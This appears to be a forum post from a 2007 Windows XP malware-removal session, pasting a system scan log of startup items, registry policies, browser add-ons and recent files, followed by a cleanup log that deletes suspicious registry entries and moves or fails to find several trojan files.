LogitechSoftwareUpdate -> %ProgramFiles%\Logitech\Video\ManifestEngine.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 196608 bytes | Modified Date = 1/18/2005 5:07:54 PM | Attr = ]
< Common Startup > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup
%AllUsersStartup%\Adobe Gamma Loader.lnk -> %CommonProgramFiles%\Adobe\Calibration\Adobe Gamma Loader.exe -> Adobe Systems, Inc. [Ver = 1, 0, 0, 1 | Size = 113664 bytes | Modified Date = 11/4/1999 3:06:48 PM | Attr = ]
%AllUsersStartup%\Adobe Reader Speed Launch.lnk -> %ProgramFiles%\Adobe\Acrobat 7.0\Reader\reader_sl.exe -> Adobe Systems Incorporated [Ver = 7.0.5.2005092300 | Size = 29696 bytes | Modified Date = 9/23/2005 10:05:26 PM | Attr = ]
%AllUsersStartup%\D-Link AirPlus G Configuration Utility.lnk -> %ProgramFiles%\D-Link AirPlus G\AIRPLUS.exe -> D-Link [Ver = 1, 0, 0, 0 | Size = 294912 bytes | Modified Date = 1/6/2004 9:19:38 PM | Attr = ]
%AllUsersStartup%\HotSync Manager.lnk -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
%AllUsersStartup%\hp psc 2000 Series.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
%AllUsersStartup%\hpoddt01.exe.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
%AllUsersStartup%\Sony PDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
%AllUsersStartup%\SonyPDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
< User Startup > -> C:\Documents and Settings\Admin\Start Menu\Programs\Startup
-> %UserStartup%\PowerReg Scheduler V3.exe -> Leader Technologies [Ver = 3,0,0,0 | Size = 225280 bytes | Modified Date = 5/27/2004 11:02:24 PM | Attr = ]
< ShellExecuteHooks [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{57B86673-276A-48B2-BAE7-C6DBB3020EB8} [HKLM] -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll [AVG Anti-Spyware 7.5] -> GRISOFT s.r.o. [Ver = 7, 5, 1, 36 | Size = 79408 bytes | Modified Date = 5/30/2007 7:29:58 AM | Attr = ]
< SecurityProviders [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\\SecurityProviders
< Winlogon settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< Winlogon settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< CurrentVersion Policy Settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> _
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoCDBurning -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} -> 1073741857 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{0DF44EAA-FF21-4412-828E-260A8728E7F1} -> 32 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\dontdisplaylastusername -> 0 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticecaption -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticetext -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\shutdownwithoutlogon -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\undockwithoutlogon -> 1 ->
< CurrentVersion Policy Settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> 145 ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\\DisableRegistryTools -> 0 ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\WinOldApp\ -> ->
< HOSTS File > (734 bytes) -> C:\WINDOWS\System32\drivers\etc\Hosts
127.0.0.1 localhost -> ->
< Internet Explorer Settings > ->
HKLM: Default_Page_URL -> http://www.dell4me.com/myway ->
HKLM: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Local Page -> %SystemRoot%\system32\blank.htm ->
HKLM: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Start Page -> http://www.dell4me.com/myway ->
HKLM: CustomizeSearch -> http://ie.search.msn.com/en-us/srchasst/srchcust.htm ->
HKLM: SearchAssistant -> http://ie.search.msn.com/en-us/srchasst/srchasst.htm ->
HKCU: Default_Page_URL -> http://www.dell4me.com/myway ->
HKCU: Local Page -> C:\WINDOWS\system32\blank.htm ->
HKCU: Search Bar -> http://g.msn.com/0SEENUS/SAOS01 ->
HKCU: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKCU: Start Page -> http://www.yahoo.com/ ->
HKCU: ProxyEnable -> 0 ->
< Trusted Sites > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
msn.com [ - ] -> ->
< BHO's > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKLM] -> %ProgramFiles%\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> Adobe Systems Incorporated [Ver = 7.0.7.2006011200 | Size = 63128 bytes | Modified Date = 1/12/2006 8:38:22 PM | Attr = ]
{53707962-6F74-2D53-2644-206D7942484F} [HKLM] -> %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [] -> Safer Networking Limited [Ver = 1, 4, 0, 0 | Size = 853672 bytes | Modified Date = 5/31/2005 1:04:00 AM | Attr = ]
{5CA3D70E-1895-11CF-8E15-001234567890} [HKLM] -> %System32%\dla\tfswshx.dll [DriveLetterAccess] -> Sonic Solutions [Ver = 1.04.05b | Size = 106548 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} [HKLM] -> %ProgramFiles%\Java\jre1.6.0_01\bin\ssv.dll [SSVHelper Class] -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 501400 bytes | Modified Date = 3/14/2007 3:43:40 AM | Attr = ]
< Internet Explorer Extensions [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKLM] -> Reg Data - Key not found [MenuText: Sun Java Console] -> File not found
{6224f700-cba3-4071-b251-47cb894244cd} -> %ProgramFiles%\ICQ\Icq.exe [ButtonText: ICQ Pro] -> ICQ Inc. [Ver = 5,5,6,3916 | Size = 1880639 bytes | Modified Date = 10/14/2003 12:03:50 PM | Attr = ]
{B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} -> %ProgramFiles%\PartyPoker\PartyPoker.exe [ButtonText: PartyPoker.com] -> iGlobalMedia.com [Ver = 1, 0, 0, 1 | Size = 2613248 bytes | Modified Date = 7/8/2005 10:09:02 PM | Attr = ]
< Internet Explorer Plugins [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension\
.spop -> %ProgramFiles%\Internet Explorer\PLUGINS\NPDocBox.dll [Reg Data - Value does not exist] -> Intertrust Technologies, Inc. [Ver = 1.0.0.32 | Size = 270336 bytes | Modified Date = 8/1/2001 5:05:42 PM | Attr = ]
< User Agent Post Platform [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
SV1 -> ->
< DNS Name Servers [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\
{0581109B-E7CC-4D2F-B921-CCF4FB6790E4} -> (Linksys Wireless-G Portable USB Adapter) ->
{20D39951-162D-4C18-BA0D-C3EEBE0EB3AB} -> (D-Link AirPlus G DWL-G510 Wireless PCI Card) ->
{4B250AFE-87CE-406A-B213-8C7324DF6680} -> (Intel® PRO/100 VE Network Connection) ->
{54C8B121-B672-4595-9CA6-5143E89EBCF9} -> (Linksys Wireless-G Portable USB Adapter) ->
{86F8ED03-8E4A-4B80-9904-0E7D717F5A6F} -> (Linksys Wireless-G Portable USB Adapter) ->
{AAB4CE79-BE6C-443B-B902-938DDEE245DC} -> () ->
{DDE840E8-BF69-465D-9359-CB4DE1510B2C} -> (Linksys Wireless-G Portable USB Adapter) ->
< Winsock2 Catalogs [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\
Protocol_Catalog9\Catalog_Entries\000000000001 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000002 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000003 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000009 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
< Protocol Handlers [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\
ipp -> Reg Data - Key not found -> File not found
lbxfile -> %ProgramFiles%\Libronix DLS\System\FileProt.dll -> Libronix Corporation [Ver = 2.1.90.1 | Size = 184320 bytes | Modified Date = 4/27/2004 2:25:54 AM | Attr = ]
lbxres -> %ProgramFiles%\Libronix DLS\System\ResProt.dll -> Libronix Corporation [Ver = 2.1.93.1 | Size = 131072 bytes | Modified Date = 4/27/2004 2:29:20 AM | Attr = ]
msdaipp -> Reg Data - Key not found -> File not found
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\
{33564D57-0000-0010-8000-00AA00389B71} -> - CodeBase = http://download.microsoft.com/download/F/6...922/wmv9VCM.CAB ->
{4C39376E-FA9D-4349-BACC-D305C1750EF3} -> EPUImageControl Class - CodeBase = http://tools.ebayimg.com/eps/wl/activex/eB...l_v1-0-3-30.cab ->
{4F1E5B1A-2A80-42CA-8532-2D05CB959537} -> MSN Photo Upload Tool - CodeBase = http://by103fd.bay103.hotmail.msn.com/resources/MsnPUpld.cab ->
{8AD9C840-044E-11D1-B3E9-00805F499D93} -> Java Plug-in 1.6.0_01 - CodeBase = http://java.sun.com/products/plugin/autodl...indows-i586.cab ->
{8E0D4DE5-3180-4024-A327-4DFAD1796A8D} -> MessengerStatsClient Class - CodeBase = http://messenger.zone.msn.com/binary/Messe...nt.cab31267.cab ->
{A8658086-E6AC-4957-BC8E-8D54A7E8A790} -> GDIChk Object - CodeBase = http://www.microsoft.com/security/controls/GDI/0/GDIChk.CAB ->
{AB86CE53-AC9F-449F-9399-D8ABCA09EC09} -> Get_ActiveX Control - CodeBase = https://h17000.www1.hp.com/ewfrf-JAVA/Secur...loadManager.ocx ->
{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} -> Java Plug-in 1.6.0_01 - CodeBase = http://java.sun.com/products/plugin/autodl...indows-i586.cab ->
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} -> Java Plug-in 1.6.0_01 - CodeBase = http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab ->
{D1E7CBDA-E60E-4970-A01C-37301EF7BF98} -> Measurement Services Client v.3.7 - CodeBase = http://gameadvisor.futuremark.com/global/msc37.cab ->
{D27CDB6E-AE6D-11CF-96B8-444553540000} -> Shockwave Flash Object - CodeBase = http://download.macromedia.com/pub/shockwa...ash/swflash.cab ->

[Files/Folders - Created Within 90 days]
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [Ver = | Size = 535875584 bytes | Created Date = 1/1/1601 6:00:00 AM | Attr = HS]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Created Date = 6/2/2007 5:12:25 PM | Attr = ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Created Date = 4/4/2007 3:00:57 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Created Date = 5/22/2007 5:13:44 PM | Attr = H ]
$NtUninstallKB929123$ -> %SystemRoot%\$NtUninstallKB929123$ -> [Folder | Created Date = 6/15/2007 2:02:34 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Created Date = 4/12/2007 3:01:11 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Created Date = 5/14/2007 3:02:27 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Created Date = 4/12/2007 3:01:20 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Created Date = 5/14/2007 3:02:44 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Created Date = 4/12/2007 3:02:17 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Created Date = 4/12/2007 3:00:58 AM | Attr = H ]
$NtUninstallKB933566$ -> %SystemRoot%\$NtUninstallKB933566$ -> [Folder | Created Date = 6/15/2007 2:02:51 AM | Attr = H ]
$NtUninstallKB935839$ -> %SystemRoot%\$NtUninstallKB935839$ -> [Folder | Created Date = 6/15/2007 2:00:59 AM | Attr = H ]
$NtUninstallKB935840$ -> %SystemRoot%\$NtUninstallKB935840$ -> [Folder | Created Date = 6/15/2007 2:02:24 AM | Attr = H ]
java.exe -> %System32%\java.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 135168 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
javacpl.cpl -> %System32%\javacpl.cpl -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 69632 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
javaw.exe -> %System32%\javaw.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 135168 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
javaws.exe -> %System32%\javaws.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 139264 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Created Date = 4/12/2007 3:02:04 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Created Date = 6/14/2007 7:23:52 PM | Attr = ]
AvgAsCln.sys -> %System32%\drivers\AvgAsCln.sys -> GRISOFT, s.r.o. [Ver = 1.0.0.14 | Size = 10872 bytes | Created Date = 6/21/2007 4:06:47 PM | Attr = ]

[Files/Folders - Modified Within 90 days]
BOOT.INI -> %SystemDrive%\BOOT.INI -> [Ver = | Size = 211 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = RHS]
Documents and Settings -> %SystemDrive%\Documents and Settings -> [Folder | Modified Date = 6/21/2007 5:11:44 PM | Attr = ]
Downloaded Full Apps -> %SystemDrive%\Downloaded Full Apps -> [Folder | Modified Date = 6/2/2007 6:37:18 PM | Attr = ]
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [Ver = | Size = 535875584 bytes | Modified Date = 6/21/2007 6:59:18 PM | Attr = HS]
hpfr5550.xml -> %SystemDrive%\hpfr5550.xml -> [Ver = | Size = 488 bytes | Modified Date = 5/22/2007 3:05:10 AM | Attr = ]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Modified Date = 6/2/2007 6:08:26 PM | Attr = ]
Program Files -> %ProgramFiles% -> [Folder | Modified Date = 6/21/2007 10:18:52 PM | Attr = R ]
WINDOWS -> %SystemRoot% -> [Folder | Modified Date = 6/21/2007 7:07:56 PM | Attr = ]
$hf_mig$ -> %SystemRoot%\$hf_mig$ -> [Folder | Modified Date = 6/14/2007 8:27:48 PM | Attr = H ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Modified Date = 4/4/2007 4:01:00 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Modified Date = 5/22/2007 6:13:46 PM | Attr = H ]
$NtUninstallKB929123$ -> %SystemRoot%\$NtUninstallKB929123$ -> [Folder | Modified Date = 6/15/2007 3:02:38 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Modified Date = 4/12/2007 4:01:14 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Modified Date = 5/14/2007 4:02:28 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Modified Date = 4/12/2007 4:01:22 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Modified Date = 5/14/2007 4:02:48 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Modified Date = 4/12/2007 4:02:20 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Modified Date = 4/12/2007 4:01:00 AM | Attr = H ]
$NtUninstallKB933566$ -> %SystemRoot%\$NtUninstallKB933566$ -> [Folder | Modified Date = 6/15/2007 3:02:56 AM | Attr = H ]
$NtUninstallKB935839$ -> %SystemRoot%\$NtUninstallKB935839$ -> [Folder | Modified Date = 6/15/2007 3:01:00 AM | Attr = H ]
$NtUninstallKB935840$ -> %SystemRoot%\$NtUninstallKB935840$ -> [Folder | Modified Date = 6/15/2007 3:02:26 AM | Attr = H ]
1Way.ini -> %SystemRoot%\1Way.ini -> [Ver = | Size = 315 bytes | Modified Date = 5/10/2007 10:30:36 PM | Attr = ]
BOOTSTAT.DAT -> %SystemRoot%\BOOTSTAT.DAT -> [Ver = | Size = 2048 bytes | Modified Date = 6/21/2007 6:59:22 PM | Attr = S]
CAVTemp -> %SystemRoot%\CAVTemp -> [Folder | Modified Date = 6/1/2007 9:46:04 PM | Attr = ]
Help -> %SystemRoot%\Help -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
imsins.BAK -> %SystemRoot%\imsins.BAK -> [Ver = | Size = 1374 bytes | Modified Date = 6/15/2007 3:02:44 AM | Attr = ]
INF -> %SystemRoot%\INF -> [Folder | Modified Date = 6/15/2007 3:03:10 AM | Attr = H ]
Installer -> %SystemRoot%\Installer -> [Folder | Modified Date = 6/21/2007 10:29:20 PM | Attr = HS]
Minidump -> %SystemRoot%\Minidump -> [Folder | Modified Date = 5/5/2007 11:19:12 AM | Attr = ]
MSAGENT -> %SystemRoot%\MSAGENT -> [Folder | Modified Date = 4/12/2007 4:09:08 AM | Attr = ]
Prefetch -> %SystemRoot%\Prefetch -> [Folder | Modified Date = 6/21/2007 10:25:30 PM | Attr = ]
quark.ini -> %SystemRoot%\quark.ini -> [Ver = | Size = 33 bytes | Modified Date = 3/30/2007 7:45:48 AM | Attr = ]
SECURITY -> %SystemRoot%\SECURITY -> [Folder | Modified Date = 4/12/2007 4:08:30 AM | Attr = ]
SoftwareDistribution -> %SystemRoot%\SoftwareDistribution -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
SYSTEM.INI -> %SystemRoot%\SYSTEM.INI -> [Ver = | Size = 227 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SYSTEM32 -> %System32% -> [Folder | Modified Date = 6/21/2007 10:28:54 PM | Attr = ]
Temp -> %SystemRoot%\Temp -> [Folder | Modified Date = 6/21/2007 6:59:34 PM | Attr = ]
WIN.INI -> %SystemRoot%\WIN.INI -> [Ver = | Size = 836 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SA.DAT -> %SystemRoot%\tasks\SA.DAT -> [Ver = | Size = 6 bytes | Modified Date = 6/21/2007 6:59:28 PM | Attr = H ]
CatRoot2 -> %System32%\CatRoot2 -> [Folder | Modified Date = 6/21/2007 10:21:16 PM | Attr = ]
DLLCACHE -> %System32%\DLLCACHE -> [Folder | Modified Date = 6/15/2007 3:03:04 AM | Attr = RHS]
DRIVERS -> %System32%\DRIVERS -> [Folder | Modified Date = 6/21/2007 5:06:48 PM | Attr = ]
FNTCACHE.DAT -> %System32%\FNTCACHE.DAT -> [Ver = | Size = 4350120 bytes | Modified Date = 4/4/2007 4:07:28 AM | Attr = ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Modified Date = 4/12/2007 4:02:06 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Modified Date = 6/21/2007 7:02:54 PM | Attr = ]
PERFC009.DAT -> %System32%\PERFC009.DAT -> [Ver = | Size = 60550 bytes | Modified Date = 6/21/2007 7:04:38 PM | Attr = ]
PERFH009.DAT -> %System32%\PERFH009.DAT -> [Ver = | Size = 398180 bytes | Modified Date = 6/21/2007 7:04:38 PM | Attr = ]
PerfStringBackup.INI -> %System32%\PerfStringBackup.INI -> [Ver = | Size = 465758 bytes | Modified Date = 6/21/2007 7:04:36 PM | Attr = ]
WPA.DBL -> %System32%\WPA.DBL -> [Ver = | Size = 1170 bytes | Modified Date = 6/21/2007 7:12:56 PM | Attr = ]
AvgAsCln.sys -> %System32%\drivers\AvgAsCln.sys -> GRISOFT, s.r.o. [Ver = 1.0.0.14 | Size = 10872 bytes | Modified Date = 5/30/2007 7:10:42 AM | Attr = ]
VetEBoot.sys -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 108624 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]
VetEFile.sys -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 630432 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]

[File String Scan - Non-Microsoft Only]
PEC2 , -> %System32%\DFRG.MSC -> [Ver = | Size = 41397 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
winsync , -> %System32%\WBDBASE.DEU -> [Ver = | Size = 1309184 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
Thawte Consulting , -> %System32%\XceedFtp.dll -> Xceed Software Inc (450) 442-2626 support@xceedsoft.com www.xceedsoft.com [Ver = 1.0.42.0 | Size = 236576 bytes | Modified Date = 10/2/2003 6:36:22 PM | Attr = ]
WSUD , UPX0 , -> %System32%\dllcache\hwxjpn.dll -> [Ver = | Size = 13463552 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
PTech , -> %System32%\drivers\mtlstrm.sys -> Smart Link [Ver = 3.80.01MC15 | Size = 1309184 bytes | Modified Date = 8/4/2004 12:41:38 AM | Attr = ]

< End of report >

2) AVG didn't make a report, but it found 3 viruses/trojans

3) Explorer killed successfully
[Processes - Non-Microsoft Only]
Unable to kill process a.exe .
File C:\WINDOWS\SYSTEM32\a.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
[Win32 Services - Non-Microsoft Only]
Service Microsoft Update RunOnce Service stopped successfully.
Service Microsoft Update RunOnce Service deleted successfully.
C:\WINDOWS\spupdsvc.exe moved successfully.
[Registry - Non-Microsoft Only]
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\MSMSGNER deleted successfully.
File C:\WINDOWS\SYSTEM32\a.exe not found.
Registry value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\MoneyAgent deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{32683183-48a0-441b-a342-7c2a440a9478} deleted successfully.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar\\{BA52B914-B692-46c4-B683-905236F6F655} deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{CD67F990-D8E9-11d2-98FE-00C0F0318AFE} deleted successfully.
Registry key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel deleted successfully.
[Files/Folders - Created Within 90 days]
DllUnregisterServer procedure not found in C:\WINDOWS\spupdsvc.dll
C:\WINDOWS\spupdsvc.dll NOT unregistered.
C:\WINDOWS\spupdsvc.dll moved successfully.
File C:\WINDOWS\spupdsvc.exe not found!
DllUnregisterServer procedure not found in C:\WINDOWS\spupdsvcHook.dll
C:\WINDOWS\spupdsvcHook.dll NOT unregistered.
C:\WINDOWS\spupdsvcHook.dll moved successfully.
File C:\WINDOWS\SYSTEM32\a.exe not found!
LoadLibrary failed for C:\WINDOWS\SYSTEM32\iaxcfg32.dll
C:\WINDOWS\SYSTEM32\iaxcfg32.dll NOT unregistered.
C:\WINDOWS\SYSTEM32\iaxcfg32.dll moved successfully.
File C:\WINDOWS\SYSTEM32\istjor.exe not found!
File C:\WINDOWS\SYSTEM32\ktzobo.exe not found!
C:\WINDOWS\SYSTEM32\wmism23delete.exe moved successfully.
[Files/Folders - Modified Within 90 days]
File C:\WINDOWS\spupdsvc.dll not found!
